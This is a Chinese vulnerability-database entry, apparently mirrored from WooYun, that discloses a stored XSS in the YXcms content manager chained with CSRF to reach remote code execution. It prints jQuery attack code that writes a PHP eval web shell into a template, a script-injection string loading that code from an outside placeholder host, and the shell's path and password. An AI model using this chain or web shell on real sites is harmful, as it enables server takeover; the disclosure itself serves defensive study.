YXcmsApp某处xss导致getshell

基本字段

漏洞编号：: SSV-95912

披露/发现时间：: 2014-01-05

提交时间：: 2014-01-05

漏洞等级：

漏洞类别：: 其他类型

影响组件：: YXcms

漏洞作者：: phith0n

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2014-047805

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： xss到后台导致getshell一条龙服务~不过略鸡肋。 ### 详细说明： YXCMS是一款面向企业的内容管理系统，采用三级缓存，MVC架构以BSD协议开源。注册了用户以后来到用户管理页面，点击信息发布 - 增加咨询，发现是一个富文本编辑器，kindeditor。不管是什么编辑器，既然给了一个用户这么大的权限，这种情况下很容易出现xss。随便输入点什么东西，抓包，修改content字段内容，写你的xss代码，什么都行。 [<img src="https://images.seebug.org/upload/201401/03204918675144fc7dab552f0a22d154d46e3059.jpg" alt="01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/03204918675144fc7dab552f0a22d154d46e3059.jpg) 好了。管理员在后台就能看到我提交的文章： [<img src="https://images.seebug.org/upload/201401/03204942d0838196cd717e2ee59455c9b3f2a221.jpg" alt="02.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/03204942d0838196cd717e2ee59455c9b3f2a221.jpg) 然后编辑的话就能触发xss： [<img src="https://images.seebug.org/upload/201401/03204959e7da6c65f843106c0d3497193ac98613.jpg" alt="03.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/03204959e7da6c65f843106c0d3497193ac98613.jpg) 再利用后台的代码编辑功能我就能直接getshell了，先构造一个javascript，因为这个站是用Jquery写的前端，所以我们的xss代码也能直接用Jquery完成： ``` $(document).ready(function(){ var code = "<?php eval($_POST[f4ckkk]); ?><?php return array ( 'name' => '最新默认模板2013-2-1', 'author' => 'yx',); ?> "; $.post("/tmp/index.php?r=admin/set/tpedit&Mname=default&fname=info.php", { "code": code },function(data){}); }); ``` 一个简单的post提交，因为没有验证token，所以也算一个CSRF。将以上代码保存为http://xxxxx/xx.js，然后作为xss代码就行了：</textarea><script src=”http://xxxx/xx.js”></script> 执行以后就会修改模板，加入我们的一句话。地址就是：/protected/apps/default/view/default/info.php 密码：f4ckkk [<img src="https://images.seebug.org/upload/201401/032051018f60103c4582ccedc13ebe69a4c96774.jpg" alt="05.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/032051018f60103c4582ccedc13ebe69a4c96774.jpg) 我们来到这个文件，可以看到我刚才post过去的内容已经完完整整地躺在那里了： [<img src="https://images.seebug.org/upload/201401/03205124aa0484098a2b93e6d50263fe47ad8b6c.jpg" alt="04.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/03205124aa0484098a2b93e6d50263fe47ad8b6c.jpg) ### 漏洞证明：见详细说明。

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2014-047805

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

YXcmsApp某处xss导致getshell

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定